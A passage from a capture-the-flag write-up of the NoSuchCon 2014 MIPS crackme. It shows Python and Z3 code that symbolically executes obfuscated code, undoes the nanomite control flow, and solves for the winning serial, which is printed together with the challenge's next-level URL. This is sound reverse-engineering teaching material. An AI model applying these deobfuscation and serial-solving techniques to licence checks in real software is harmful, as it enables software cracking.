Resulting value when `a` is 0xdeadb44: 0x98f42d24
==================================================

Of course, I didn't mention a lot of details that still need to be addressed to have something working: simulating data areas, memory layouts, etc. If you are interested in those, you should read the codes in my NoSuchCon2014 folder.

Back into the battlefield

Here comes the important bits!

Extracting the function that generates the magic value from the son program counter

All right, the main objective in this part is to extract the formula that generates the first magic value. As we said earlier, this big block can be seen as a function that takes two arguments (or symbolic variables) and generates the magic DWORD in output. The first thing to do is to copy the code somewhere to feed it to our engine ; I decided to stick all the codes I needed into a separate Python file called code.py.

block_generate_magic_from_pc_son = '''.text:00400B8C                 lw      $v0, 0x318+pc_son($fp)  # Load Word
.text:00400B90                 sw      $v0, 0x318+tmp_pc($fp)  # Store Word
.text:00400B94                 la      $v0, loc_400A78  # Load Address
.text:00400B9C                 lw      $v1, 0x318+tmp_pc($fp)  # Load Word
.text:00400BA0                 subu    $v0, $v1, $v0    # (regs.pc_father - 400A78)
.text:00400BA4                 sw      $v0, 0x318+tmp_pc($fp)  # Store Word
.text:00400BA8                 lw      $v0, 0x318+var_300($fp)  # Load Word
.text:00400BAC                 li      $v1, 0x446F8657  # Load Immediate
.text:00400BB4                 multu   $v0, $v1         # Multiply Unsigned
.text:00400BB8                 mfhi    $v1              # Move From HI
.text:00400BBC                 subu    $v0, $v1         # Subtract Unsigned
[...]
.text:00401424                 lw      $v0, 0x318+var_2F0($fp)  # Load Word
.text:00401428                 nor     $v0, $zero, $v0  # NOR
.text:0040142C                 addiu   $v0, 0x20        # Add Immediate Unsigned
.text:00401430                 lw      $a0, 0x318+tmp_pc($fp)  # Load Word
.text:00401434                 sllv    $v0, $a0, $v0    # Shift Left Logical Variable
.text:00401438                 or      $v0, $v1, $v0    # OR
.text:0040143C                 sw      $v0, 0x318+tmp_pc($fp)  # Store Word'''.split('\n')

Then we have to prepare the environment of our engine: the two symbolic variables are stack-variables, so we have to insert them in the context of our virtual environment. The resulting formula is going to be in $v0 at the end of the execution ; this the holy grail, the formula we are after.

def extract_equation_of_function_that_generates_magic_value():
  '''Here we do some magic to transform our mini MIPS emulator
  into a symbolic execution engine ; the purpose is to extract
  the formula of the function generating the 32-bits magic value'''

  x = mini_mips_symexec_engine.MiniMipsSymExecEngine('function_that_generates_magic_value.log')
  x.debug = False
  x.enable_z3 = True
  pc_son = BitVec('pc_son', 32)
  n_break = BitVec('n_break', 32)
  x.stack['pc_son'] =  pc_son
  x.stack['var_300'] = n_break
  emu_generate_magic_from_son_pc(x, print_final_state = False)
  compute_magic_equation = x.gpr['v0']
  with open(os.path.join('formulas', 'generate_magic_value_from_pc_son.smt2'), 'w') as f:
    f.write(to_SMT2(compute_magic_equation, name = 'generate_magic_from_pc_son'))

  return pc_son, n_break, simplify(compute_magic_equation)

You can now keep in memory the formula & wrap this function in another one so that you can reuse it every time you need it:

var_magic, var_n_break, expr_magic = [None]*3
def generate_magic_from_son_pc_using_z3(pc_son, n_break):
  '''Generates the 32 bits magic value thanks to the output
  of the symbolic execution engine: run the analysis once, extract
  the complete equation & reuse it as much as you want'''
  global var_magic, var_n_break, expr_magic
  if var_magic is None and var_n_break is None and expr_magic is None:
    var_magic, var_n_break, expr_magic = extract_equation_of_function_that_generates_magic_value()

  return substitute(
    expr_magic,
    (var_magic, BitVecVal(pc_son, 32)),
    (var_n_break, BitVecVal(n_break, 32))
  ).as_long()

The power of using symbolic variables here lies in the fact that we don't need to run the emulator every single time you need to call this function ; you get once the generic formula and you just have to substitute the symbolic variables by the concrete values you want. This comes for free with our code, so let's use it heh :-).

; generate_magic_from_pc_son
(declare-fun n_break () (_ BitVec 32))
(declare-fun pc_son () (_ BitVec 32))
(let ((?x14 (bvadd n_break (bvmul (_ bv4294967295 32) ((_ extract 63 32) (bvmul (_ bv1148159575 64) (concat (_ bv0 32) n_break)))))))
(let ((?x21 ((_ extract 63 32) (bvmul (_ bv1148159575 64) (concat (_ bv0 32) n_break)))))
(let ((?x8 (bvadd ?x21 (concat (_ bv0 1) ((_ extract 31 1) ?x14)))))
(let ((?x26 ((_ extract 31 6) ?x8)))
(let ((?x24 (bvadd (_ bv32 32) (concat (_ bv63 6) (bvnot ?x26)))))
(let ((?x27 (concat (_ bv0 6) ?x26)))
(let ((?x42 (bvmul (_ bv4294967295 32) ?x27)))
(let ((?x67 ((_ extract 6 6) ?x8)))
(let ((?x120 ((_ extract 7 6) ?x8)))
(let ((?x38 (concat (bvadd (_ bv30088 15) ((_ extract 14 0) pc_son)) ((_ extract 31 15) (bvadd (_ bv4290770312 32) pc_son)))))
(let ((?x41 (bvxor (bvadd (bvor (bvlshr ?x38 (bvadd (_ bv1 32) ?x27)) (bvshl ?x38 ?x24)) ?x42) ?x27)))
(let ((?x63 (bvor ((_ extract 0 0) (bvlshr ?x38 (bvadd (_ bv1 32) ?x27))) ((_ extract 0 0) (bvshl ?x38 ?x24)))))
(let ((?x56 (concat (bvadd (_ bv1 1) (bvxor (bvadd ?x63 ?x67) ?x67)) ((_ extract 31 1) (bvadd (_ bv2142377237 32) ?x41)))))
(let ((?x66 (concat (bvadd ((_ extract 9 1) (bvadd (_ bv2142377237 32) ?x41)) ((_ extract 14 6) ?x8)) ((_ extract 31 31) (bvadd ?x56 ?x27)) ((_ extract 30 9) (bvadd ((_ extract 31 1) (bvadd (_ bv2142377237 32) ?x41)) (concat (_ bv0 5) ?x26))))))
(let ((?x118 (bvor ((_ extract 1 0) (bvshl ?x66 (bvadd (_ bv1 32) ?x27))) ((_ extract 1 0) (bvlshr ?x66 ?x24)))))
(let ((?x122 (bvnot (bvadd ?x118 ?x120))))
(let ((?x45 (bvadd (bvor (bvshl ?x66 (bvadd (_ bv1 32) ?x27)) (bvlshr ?x66 ?x24)) ?x27)))
(let ((?x76 ((_ extract 4 2) ?x45)))
(let ((?x110 (bvnot ((_ extract 5 5) ?x45))))
(let ((?x55 ((_ extract 8 6) ?x45)))
(let ((?x108 (bvnot ((_ extract 10 9) ?x45))))
(let ((?x78 ((_ extract 13 11) ?x45)))
(let ((?x106 (bvnot ((_ extract 14 14) ?x45))))
(let ((?x80 ((_ extract 15 15) ?x45)))
(let ((?x104 (bvnot ((_ extract 16 16) ?x45))))
(let ((?x123 (concat (bvnot ((_ extract 31 29) ?x45)) ((_ extract 28 28) ?x45) (bvnot ((_ extract 27 27) ?x45)) ((_ extract 26 26) ?x45) (bvnot ((_ extract 25 25) ?x45)) ((_ extract 24 24) ?x45) (bvnot ((_ extract 23 21) ?x45)) ((_ extract 20 20) ?x45) (bvnot ((_ extract 19 18) ?x45)) ((_ extract 17 17) ?x45) ?x104 ?x80 ?x106 ?x78 ?x108 ?x55 ?x110 ?x76 ?x122)))
(let ((?x50 (concat (bvnot ((_ extract 30 29) ?x45)) ((_ extract 28 28) ?x45) (bvnot ((_ extract 27 27) ?x45)) ((_ extract 26 26) ?x45) (bvnot ((_ extract 25 25) ?x45)) ((_ extract 24 24) ?x45) (bvnot ((_ extract 23 21) ?x45)) ((_ extract 20 20) ?x45) (bvnot ((_ extract 19 18) ?x45)) ((_ extract 17 17) ?x45) ?x104 ?x80 ?x106 ?x78 ?x108 ?x55 ?x110 ?x76 ?x122)))
(let ((?x91 (bvadd (_ bv1720220585 32) (concat (bvnot (bvadd (_ bv612234822 31) ?x50)) (bvnot ((_ extract 31 31) (bvadd (_ bv612234822 32) ?x123)))) ?x42)))
(let ((?x137 (bvnot (bvadd (_ bv128582 17) (concat ?x104 ?x80 ?x106 ?x78 ?x108 ?x55 ?x110 ?x76 ?x122)))))
(let ((?x146 (bvadd (_ bv31657 18) (concat ?x137 (bvnot ((_ extract 31 31) (bvadd (_ bv612234822 32) ?x123)))) (bvmul (_ bv262143 18) ((_ extract 23 6) ?x8)))))
(let ((?x131 (bvadd (_ bv2800103692 32) (concat ?x146 ((_ extract 31 18) ?x91)))))
(let ((?x140 (concat ((_ extract 18 18) ?x91) ((_ extract 31 31) ?x131) (bvnot ((_ extract 30 30) ?x131)) ((_ extract 29 27) ?x131) (bvnot ((_ extract 26 25) ?x131)) ((_ extract 24 24) ?x131) (bvnot ((_ extract 23 22) ?x131)) ((_ extract 21 21) ?x131) (bvnot ((_ extract 20 20) ?x131)) ((_ extract 19 19) ?x131) (bvnot ((_ extract 18 17) ?x131)) ((_ extract 16 14) ?x131) (bvnot ((_ extract 13 9) ?x131)) ((_ extract 8 8) ?x131) (bvnot ((_ extract 7 6) ?x131)) ((_ extract 5 4) ?x131) (bvnot ((_ extract 3 1) ?x131)))))
(let ((?x176 (bvnot (bvadd (concat ((_ extract 4 4) ?x131) (bvnot ((_ extract 3 1) ?x131))) ((_ extract 9 6) ?x8)))))
(let ((?x177 (bvadd (concat ?x176 (bvnot ((_ extract 31 4) (bvadd ?x140 ?x27)))) ?x42)))
(let ((?x187 (bvadd (bvnot ((_ extract 13 4) (bvadd ?x140 ?x27))) (bvmul (_ bv1023 10) ((_ extract 15 6) ?x8)))))
(let ((?x180 (concat (bvadd ((_ extract 23 10) ?x177) (bvmul (_ bv16383 14) ((_ extract 19 6) ?x8))) ((_ extract 31 14) (bvadd (concat ?x187 ((_ extract 31 10) ?x177)) ?x42)))))
(let ((?x79 (bvadd (bvxor (bvadd ?x180 ?x27) ?x27) ?x42)))
(let ((?x211 (concat (bvadd ((_ extract 17 10) ?x177) (bvmul (_ bv255 8) ((_ extract 13 6) ?x8))) ((_ extract 31 14) (bvadd (concat ?x187 ((_ extract 31 10) ?x177)) ?x42)))))
(let ((?x190 (concat (bvnot (bvadd (bvxor (bvadd ?x211 ?x26) ?x26) (bvmul (_ bv67108863 26) ?x26))) (bvnot ((_ extract 31 26) ?x79)))))
(let ((?x173 (bvadd (bvnot (bvadd (_ bv3113082326 32) ?x190 ?x27)) ?x27)))
(let ((?x174 ((_ extract 9 6) ?x8)))
(let ((?x255 ((_ extract 2 2) (bvadd (bvnot (bvadd (_ bv6 4) (bvnot ((_ extract 29 26) ?x79)) ?x174)) ?x174))))
(let ((?x253 ((_ extract 3 3) (bvadd (bvnot (bvadd (_ bv6 4) (bvnot ((_ extract 29 26) ?x79)) ?x174)) ?x174))))
(let ((?x144 ((_ extract 23 6) ?x8)))
(let ((?x233 ((_ extract 17 6) ?x8)))
(let ((?x235 (bvxor (bvadd ((_ extract 25 14) (bvadd (concat ?x187 ((_ extract 31 10) ?x177)) ?x42)) ?x233) ?x233)))
(let ((?x244 (bvadd (_ bv122326 18) (concat (bvnot (bvadd ?x235 (bvmul (_ bv4095 12) ?x233))) (bvnot ((_ extract 31 26) ?x79))) ?x144)))
(let ((?x246 (bvadd (bvnot ?x244) ?x144)))
(let ((?x293 (concat (bvnot ((_ extract 24 23) ?x173)) ((_ extract 22 18) ?x173) ((_ extract 17 17) ?x246) (bvnot ((_ extract 16 16) ?x246)) ((_ extract 15 15) ?x246) (bvnot ((_ extract 14 12) ?x246)) ((_ extract 11 10) ?x246) (bvnot ((_ extract 9 9) ?x246)) ((_ extract 8 8) ?x246) (bvnot ((_ extract 7 7) ?x246)) ((_ extract 6 6) ?x246) (bvnot ((_ extract 5 4) ?x246)) (bvnot ?x253) ?x255 (bvnot (bvadd (bvnot (bvadd (_ bv2 2) (bvnot ((_ extract 27 26) ?x79)) ?x120)) ?x120)) (bvnot ((_ extract 31 29) ?x173)) ((_ extract 28 28) ?x173) (bvnot ((_ extract 27 26) ?x173)) ((_ extract 25 25) ?x173))))
(let ((?x324 (bvor ((_ extract 0 0) (bvshl ?x293 (bvadd (_ bv1 32) ?x27))) ((_ extract 0 0) (bvlshr ?x293 ?x24)))))
(let ((?x202 (bvadd (bvor (bvshl ?x293 (bvadd (_ bv1 32) ?x27)) (bvlshr ?x293 ?x24)) ?x27)))
(let ((?x261 (concat ((_ extract 31 31) ?x202) (bvnot ((_ extract 30 29) ?x202)) ((_ extract 28 27) ?x202) (bvnot ((_ extract 26 25) ?x202)) ((_ extract 24 22) ?x202) (bvnot ((_ extract 21 18) ?x202)) ((_ extract 17 17) ?x202) (bvnot ((_ extract 16 15) ?x202)) ((_ extract 14 13) ?x202) (bvnot ((_ extract 12 12) ?x202)) ((_ extract 11 7) ?x202) (bvnot ((_ extract 6 5) ?x202)) ((_ extract 4 2) ?x202) (bvnot ((_ extract 1 1) ?x202)) (bvadd ?x324 ?x67))))
(let ((?x250 (concat ((_ extract 11 7) ?x202) (bvnot ((_ extract 6 5) ?x202)) ((_ extract 4 2) ?x202) (bvnot ((_ extract 1 1) ?x202)) (bvadd ?x324 ?x67))))
(let ((?x331 (bvadd (_ bv1397077939 32) (concat (bvadd (_ bv4018 12) ?x250) ((_ extract 31 12) (bvadd (_ bv1471406002 32) ?x261))) ?x27)))
(let ((?x264 (bvor (bvshl (bvadd (bvnot ?x331) ?x27) (bvadd (_ bv1 32) ?x27)) (bvlshr (bvadd (bvnot ?x331) ?x27) ?x24))))
(let ((?x298 (bvor (bvshl (bvadd (_ bv1031407080 32) ?x264 ?x42) (bvadd (_ bv1 32) ?x27)) (bvlshr (bvadd (_ bv1031407080 32) ?x264 ?x42) ?x24))))
(let ((?x231 (bvor ((_ extract 31 17) (bvshl ?x298 (bvadd (_ bv1 32) ?x27))) ((_ extract 31 17) (bvlshr ?x298 ?x24)))))
(let ((?x220 (bvor ((_ extract 16 0) (bvshl ?x298 (bvadd (_ bv1 32) ?x27))) ((_ extract 16 0) (bvlshr ?x298 ?x24)))))
(let ((?x283 (bvor (bvshl (concat ?x220 ?x231) (bvadd (_ bv1 32) ?x27)) (bvlshr (concat ?x220 ?x231) ?x24))))
(let ((?x119 (bvadd (_ bv4200859627 32) (bvnot (bvor (bvshl ?x283 (bvadd (_ bv1 32) ?x27)) (bvlshr ?x283 ?x24))))))
(let ((?x201 (bvshl ?x119 ?x24)))
(let ((?x405 (bvadd (bvor ((_ extract 10 8) (bvlshr ?x119 (bvadd (_ bv1 32) ?x27))) ((_ extract 10 8) ?x201)) ((_ extract 8 6) ?x8))))
(let ((?x343 (concat (bvor ((_ extract 7 0) (bvlshr ?x119 (bvadd (_ bv1 32) ?x27))) ((_ extract 7 0) ?x201)) (bvor ((_ extract 31 8) (bvlshr ?x119 (bvadd (_ bv1 32) ?x27))) ((_ extract 31 8) ?x201)))))
(let ((?x199 (bvadd (_ bv752876532 32) (bvnot (bvadd ?x343 ?x27)) ?x27)))
(let ((?x409 (concat ((_ extract 31 29) ?x199) (bvnot ((_ extract 28 28) ?x199)) ((_ extract 27 27) ?x199) (bvnot ((_ extract 26 26) ?x199)) ((_ extract 25 25) ?x199) (bvnot ((_ extract 24 24) ?x199)) ((_ extract 23 23) ?x199) (bvnot ((_ extract 22 22) ?x199)) ((_ extract 21 21) ?x199) (bvnot ((_ extract 20 19) ?x199)) ((_ extract 18 18) ?x199) (bvnot ((_ extract 17 17) ?x199)) ((_ extract 16 16) ?x199) (bvnot ((_ extract 15 15) ?x199)) ((_ extract 14 11) ?x199) (bvnot ((_ extract 10 10) ?x199)) ((_ extract 9 9) ?x199) (bvnot ((_ extract 8 7) ?x199)) ((_ extract 6 6) ?x199) (bvnot ((_ extract 5 4) ?x199)) ((_ extract 3 3) ?x199) (bvnot (bvadd (_ bv4 3) (bvnot ?x405) ((_ extract 8 6) ?x8))))))
(let ((?x342 (bvlshr (bvadd (_ bv330202175 32) ?x409) ?x24)))
(let ((?x20 (bvadd (_ bv1 32) ?x27)))
(let ((?x337 (bvshl (bvadd (_ bv330202175 32) ?x409) ?x20)))
(let ((?x354 (bvadd (_ bv651919116 32) (bvor ?x337 ?x342))))
(let ((?x414 (concat (bvnot ((_ extract 26 26) ?x354)) ((_ extract 25 25) ?x354) (bvnot ((_ extract 24 24) ?x354)) (bvnot ((_ extract 23 23) ?x354)) ((_ extract 22 22) ?x354) (bvnot ((_ extract 21 21) ?x354)) (bvnot ((_ extract 20 18) ?x354)) ((_ extract 17 13) ?x354) (bvnot ((_ extract 12 10) ?x354)) ((_ extract 9 8) ?x354) (bvnot ((_ extract 7 7) ?x354)) ((_ extract 6 5) ?x354) (bvnot ((_ extract 4 4) ?x354)) (bvnot ((_ extract 3 3) ?x354)) (bvnot ((_ extract 2 2) ?x354)) (bvor ((_ extract 1 1) ?x337) ((_ extract 1 1) ?x342)) (bvnot (bvor ((_ extract 0 0) ?x337) ((_ extract 0 0) ?x342))) (bvnot ((_ extract 31 31) ?x354)) ((_ extract 30 30) ?x354) (bvnot ((_ extract 29 28) ?x354)) ((_ extract 27 27) ?x354))))
(let ((?x464 (concat ((_ extract 22 22) ?x354) (bvnot ((_ extract 21 21) ?x354)) (bvnot ((_ extract 20 18) ?x354)) ((_ extract 17 13) ?x354) (bvnot ((_ extract 12 10) ?x354)) ((_ extract 9 8) ?x354) (bvnot ((_ extract 7 7) ?x354)) ((_ extract 6 5) ?x354) (bvnot ((_ extract 4 4) ?x354)) (bvnot ((_ extract 3 3) ?x354)) (bvnot ((_ extract 2 2) ?x354)) (bvor ((_ extract 1 1) ?x337) ((_ extract 1 1) ?x342)) (bvnot (bvor ((_ extract 0 0) ?x337) ((_ extract 0 0) ?x342))) (bvnot ((_ extract 31 31) ?x354)) ((_ extract 30 30) ?x354) (bvnot ((_ extract 29 28) ?x354)) ((_ extract 27 27) ?x354))))
(let ((?x474 (concat (bvadd (_ bv141595581 28) (bvnot (bvxor (bvadd (_ bv178553293 28) ?x464) (concat (_ bv0 2) ?x26)))) ((_ extract 31 28) (bvadd (_ bv4168127421 32) (bvnot (bvxor (bvadd (_ bv2594472397 32) ?x414) ?x27)))))))
(let ((?x495 (bvadd (_ bv1994801052 32) (bvxor (_ bv1407993787 32) (bvor (bvshl ?x474 ?x20) (bvlshr ?x474 ?x24)) ?x27) ?x42)))
(let ((?x392 (concat (bvor ((_ extract 13 0) (bvlshr ?x495 ?x20)) ((_ extract 13 0) (bvshl ?x495 ?x24))) (bvor ((_ extract 31 14) (bvlshr ?x495 ?x20)) ((_ extract 31 14) (bvshl ?x495 ?x24))))))
(let ((?x388 (bvlshr ?x392 ?x24)))
(let ((?x494 (concat (bvnot (bvor ((_ extract 31 31) (bvshl ?x392 ?x20)) ((_ extract 31 31) ?x388))) (bvor ((_ extract 30 30) (bvshl ?x392 ?x20)) ((_ extract 30 30) ?x388)) (bvnot (bvor ((_ extract 29 27) (bvshl ?x392 ?x20)) ((_ extract 29 27) ?x388))) (bvor ((_ extract 26 25) (bvshl ?x392 ?x20)) ((_ extract 26 25) ?x388)) (bvnot (bvor ((_ extract 24 23) (bvshl ?x392 ?x20)) ((_ extract 24 23) ?x388))) (bvor ((_ extract 22 21) (bvshl ?x392 ?x20)) ((_ extract 22 21) ?x388)) (bvnot (bvor ((_ extract 20 16) (bvshl ?x392 ?x20)) ((_ extract 20 16) ?x388))) (bvor ((_ extract 15 15) (bvshl ?x392 ?x20)) ((_ extract 15 15) ?x388)) (bvnot (bvor ((_ extract 14 14) (bvshl ?x392 ?x20)) ((_ extract 14 14) ?x388))) (bvor ((_ extract 13 12) (bvshl ?x392 ?x20)) ((_ extract 13 12) ?x388)) (bvnot (bvor ((_ extract 11 10) (bvshl ?x392 ?x20)) ((_ extract 11 10) ?x388))) (bvor ((_ extract 9 8) (bvshl ?x392 ?x20)) ((_ extract 9 8) ?x388)) (bvnot (bvor ((_ extract 7 2) (bvshl ?x392 ?x20)) ((_ extract 7 2) ?x388))) (bvor ((_ extract 1 1) (bvshl ?x392 ?x20)) ((_ extract 1 1) ?x388)) (bvnot (bvor ((_ extract 0 0) (bvshl ?x392 ?x20)) ((_ extract 0 0) ?x388))))))
(let ((?x450 (bvor (bvlshr ?x494 ?x20) (bvshl ?x494 ?x24))))
(bvor (bvlshr ?x450 ?x20) (bvshl ?x450 ?x24)))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))

Quite happy we don't have to study that right?

Extracting the function that generates the new program counter from the second magic value

For the second big block of code, we can do exactly the same thing: copy the code, configure the virtual environment with our symbolic variables and wrap the function:

def extract_equation_of_function_that_generates_new_son_pc():
  '''Extract the formula of the function generating the new son's $pc'''
  x = mini_mips_symexec_engine.MiniMipsSymExecEngine('function_that_generates_new_son_pc.log')
  x.debug = False
  x.enable_z3 = True
  tmp_pc = BitVec('magic', 32)
  n_loop = BitVec('n_loop', 32)
  x.stack['tmp_pc'] = tmp_pc
  x.stack['var_2F0'] = n_loop
  emu_generate_new_pc_for_son(x, print_final_state = False)
  compute_pc_equation = simplify(x.gpr['v0'])
  with open(os.path.join('formulas', 'generate_new_pc_son.smt2'), 'w') as f:
    f.write(to_SMT2(compute_pc_equation, name = 'generate_new_pc_son'))

  return tmp_pc, n_loop, compute_pc_equation

var_new_pc, var_n_loop, expr_new_pc = [None]*3
def generate_new_pc_from_magic_high(magic_high, n_loop):
  global var_new_pc, var_n_loop, expr_new_pc
  if var_new_pc is None and var_n_loop is None and expr_new_pc is None:
    var_new_pc, var_n_loop, expr_new_pc = extract_equation_of_function_that_generates_new_son_pc()

  return substitute(
      expr_new_pc,
      (var_new_pc, BitVecVal(magic_high, 32)),
      (var_n_loop, BitVecVal(n_loop, 32))
  ).as_long()

If you are interested in what the formula looks like, it is also available in the NoSuchCon2014 folder on my github.

Putting it all together: building a function that computes the new program counter of the son

Obviously, we don't really care about those two previous functions, we just want to combine them together to implement the computation of the new program counter from both the round number & where the son SIGTRAP'd. The only missing bits is the lookup in the QWORDs array to extract the second magic value. We just have to dump the array inside another file called memory.py. This is done with a simple IDA Python one-liner:

values = dict((0x00414130+i*8, Qword(0x00414130+i*8)) for i in range(0x25E))

Now, we can build the whole function easily by combining all those pieces:

def generate_new_pc_from_pc_son_using_z3(pc_son, n_break):
  '''Generate the new program counter from the address where the son SIGTRAP'd and
  the number of SIGTRAP the son encountered'''
  loop_n = (n_break / 101)
  magic = generate_magic_from_son_pc_using_z3(pc_son, n_break)
  idx = None
  for i in range(len(memory.pcs)):
    if (memory.pcs[i] & 0xffffffff) == magic:
      idx = i
      break

  assert(idx != None)
  return generate_new_pc_from_magic_high(memory.pcs[idx] >> 32, loop_n)

Sweet. Really sweet.

This basically means we are now able to unscramble the code of the son and reordering it completely without even physically running the binary nor generating traces.

Unscramble the code like a sir

Before showing, the code I just want to explain the process one more time:

  1. The son executes some code until it reaches a break instruction
  2. The father gets the $pc of the son and the variable that counts the number of break instruction the son executed
  3. The father generates a new $pc value from those two variables
  4. The father sets the new $pc
  5. The father continues its son
  6. Goto 1!

So basically to unscramble the code, we just need to simulate what the father would do & log everything somewhere. Couple of important details though:

  • There are exactly 101 break instructions in the son, so 101 chunks of code will be executed and need to be reordered,
  • The son is executing 6 rounds ; that's exactly why the QWORD array has 6*101 entries.

Here is the function I used:

def generate_son_code_reordered(debug = False):
    '''This functions puts in the right order the son's block of codes without
    relying on the father to set a new $pc value when a break is executed in the son.
    With this output we are good to go to create a nanomites-less binary:
      - We don't need the father anymore (he was driving the son)
      - We have the code in the right order, so we can also remove the break instructions
    It will also be quite useful when we want to execute symbolic-ly its code.
    '''
    def parse_line(l):
        addr_seg, instr, _ = l.split(None, 2)
        _, addr = addr_seg.split(':')
        return int('0x%s' % addr, 0), instr

    son_code = code.block_code_of_son
    next_break = 0
    n_break = 0
    cleaned_code = []
    for _ in range(6):
        for z in range(101):
            i = 0
            while i < len(son_code):
                line = son_code[i]
                addr, instr = parse_line(line)
                if instr == 'break' and (next_break == addr or z == 0):
                    break_addr = addr
                    new_pc = generate_new_pc_from_pc_son_using_z3(break_addr, n_break)
                    n_break += 1
                    if debug:
                        print '; Found the %dth break (@%.8x) ; new pc will be %.8x' % (z, break_addr, new_pc)
                    state = 'Begin'
                    block = []
                    j = 0
                    while j < len(son_code):
                        line = son_code[j]
                        addr, instr = parse_line(line)
                        if state == 'Begin':
                            if addr == new_pc:
                                block.append(line)
                                state = 'Log'
                        elif state == 'Log':
                            if instr == 'break':
                                next_break = addr
                                state = 'End'
                            else:
                                block.append(line)
                        elif state == 'End':
                            break
                        else:
                            pass
                        j += 1

                    if debug:
                        print ';', '='*25, 'BLOCK %d' % z, '='*25
                        print '\n'.join(block)
                    cleaned_code.extend(block)
                    break
                i += 1

    return cleaned_code

And there it is :-)

The function outputs the unrolled and ordered code of the son. If you want to push further, you could theoretically perform an open-heart surgery to completely remove the nanomites from the original binary, isn't it cool? This is left as an exercise for the interested reader though :-)).

Attacking the son: the last man standing

Now that we have the code unscrambled, we can directly feed it to our engine but before doing so here are some details:

  • As we said earlier, it looks like the son is executing 6 times the same code. This is not the case at all, every round will execute the same amount of instructions but not in the same order
  • The computations executed can be seen as some kind of light encoding/encryption or decoding/decryption algorithm
  • We have 6 rounds because the input serial is broken into 6 DWORDs (so 6 symbolic variables) ; so basically each round is going to generate an output DWORD

As previously, we need to copy the code we want to execute. Note that we can also use generate_son_code_reorganized to generate it dynamically. Next step is to configure the virtual environment and we are good to finally run the code:

def get_serial():
  print '> Instantiating the symbolic execution engine..'
  x = mini_mips_symexec_engine.MiniMipsSymExecEngine('decrypt_serial.log')
  x.enable_z3 = True

  print '> Generating dynamically the code of the son & reorganizing/cleaning it..'
  # If you don't want to generate it dynamically like a sir, I've copied a version inside
  # code.block_code_of_son_reorganized_loop_unrolled :-)
  x.code = generate_son_code_reorganized()

  print '> Configuring the virtual environement..'
  x.gpr['fp'] = 0x7fff6cb0
  x.stack_offsets['var_30'] = 24
  start_addr = x.gpr['fp'] + x.stack_offsets['var_30'] + 8
  # (gdb) x/6dwx $s8+24+8
  # 0x7fff6cd0:     0x11111111      0x11111111      0x11111111
  #                 0x11111111      0x11111111      0x11111111
  a, b, c, d, e, f = BitVecs('a b c d e f', 32)
  x.mem[start_addr +  0] = a
  x.mem[start_addr +  4] = b
  x.mem[start_addr +  8] = c
  x.mem[start_addr + 12] = d
  x.mem[start_addr + 16] = e
  x.mem[start_addr + 20] = f

  print '> Running the code..'
  x.run()

The thing that matters this time is to find a, b, c, d, e, f so that they generate specific outputs ; so this is where Z3 is going to help us a lot. Thanks to that guy we don't need to manually invert the algorithm.

The final bit now is basically just about setting up the solver, setting the correct constraints and generating the serial you guys have been waiting for so long:

print '> Instantiating & configuring the solver..'
s = Solver()
s.add(
  x.mem[start_addr +   0] == 0x7953205b, x.mem[start_addr +   4] == 0x6b63616e,
  x.mem[start_addr +   8] == 0x20766974, x.mem[start_addr +  12] == 0x534e202b, 
  x.mem[start_addr +  16] == 0x203d2043, x.mem[start_addr +  20] == 0x5d20333c,
)

print '> Solving..'
if s.check() == sat:
  print '> Constraints solvable, here are the 6 DWORDs:'
  m = s.model()
  for i in (a, b, c, d, e, f):
    print ' %r = 0x%.8X' % (i, m[i].as_long())

  print '> Serial:', ''.join(('%.8x' % m[i].as_long())[::-1] for i in (a, b, c, d, e, f)).upper()
else:
  print '! Constraints unsolvable'

There we are, the final moment; drum roll

PS D:\Codes\NoSuchCon2014> python .\solve_nsc2014_step1_z3.py
==================================================
Tests OK -- you are fine to go
==================================================
> Instantiating the symbolic execution engine..
> Generating dynamically the code of the son & reorganizing/cleaning it..
> Configuring the virtual environement..
> Running the code..
> Instantiating & configuring the solver..
> Solving..
> Constraints solvable, here are the 6 DWORDs:
  a = 0xFE446223
  b = 0xBA770149
  c = 0x75BA5111
  d = 0x78EA3635
  e = 0xA9D6E85F
  f = 0xCC26C5EF
> Serial: 322644EF941077AB1115AB575363AE87F58E6D9AFE5C62CC
==================================================

overclok@wildout:~/chall/nsc2014$ ./start_vm.sh
[    0.000000] Initializing cgroup subsys cpuset
[...]
Debian GNU/Linux 7 debian-mipsel ttyS0

debian-mipsel login: root
Password:
[...]
root@debian-mipsel:~# /home/user/crackmips 322644EF941077AB1115AB575363AE87F58E6D9AFE5C62CC
good job!
Next level is there: http://nsc2014.synacktiv.com:65480/oob4giekee4zaeW9/

Boom :-).

Alternative solution

In this part, I present an alternate solution to solve the challenge. It's somehow a shortcut, since it requires much less coding than Axel's one, and uses the awesome Miasm framework.

Shortcut #1 : Tracing the parent with GDB

Quick recap of the parent's behaviour

As Axel has previously explained, the first step is to recover the child's execution flow. Because of nanomites, the child is driven by the parent; we have to analyze the parent (i.e. the debug function) first to determine the correct sequence of the child's pc values.

The parent's main loop is obfuscated, but by browsing cross-references of stack variables in IDA, we can see where each one is used. After a bit of analysis, we can try to decompile by hand the algorithm, and write a pseudo-Python code description of what the debug function does (it is really simplified):

counter = 0
waitpid()

while(True):
    regs = ptrace(GETREGS)

    # big block 1
    addr = regs.pc
    param = f(counter)
    addr = obfu1(addr, param)

    for i in range(605):
        entry = pcs[i]  # entry is 8 bytes long (2 dwords)
        if(addr == entry.first_dword):
            addr = entry.second_dword
            break

    # big block 2
    addr = obfu2(addr, param)

    regs.pc = addr
    ptrace(SETREGS, regs)
    counter += 1

    if(not waitpid()):
        break

The "big blocks" are the two long assembly blocks preceding and following the inner loop. Without looking at the gory details, we understand that a param value is derived from the counter using a function that I call f, and then used to obfuscate the original child's pc. The result is then searched in a pcs array (stored at address 0414130), the next dword is extracted and used in a 2nd obfuscation pass to finally produce the new pc value injected into the child.

The most important fact here is that that this process does not involve the input key at anytime. The output pc sequence is deterministic and constant; two executions with two different keys will produce the same sequence of pc's. Since we know the first value of pc (the first break instruction at 040228C), we can theoretically compute the correct sequence and then reorder the child's instructions according to this sequence.

We have two approaches for doing so:

  • statical analysis: somehow understand each instruction used in obfuscation passes and rewrite the algorithm producing the correct sequence. This is the path followed by Axel.
  • dynamic analysis: trace the program once and log all pc values.

Although the first one is probably the most interesting, the second is certainly the fastest. Again, it only works because the input key does not influence the output pc sequence. And we're lucky: the child is already debugged by the parent, but nothing prevents us to debug the parent itself.

First attempt at tracing

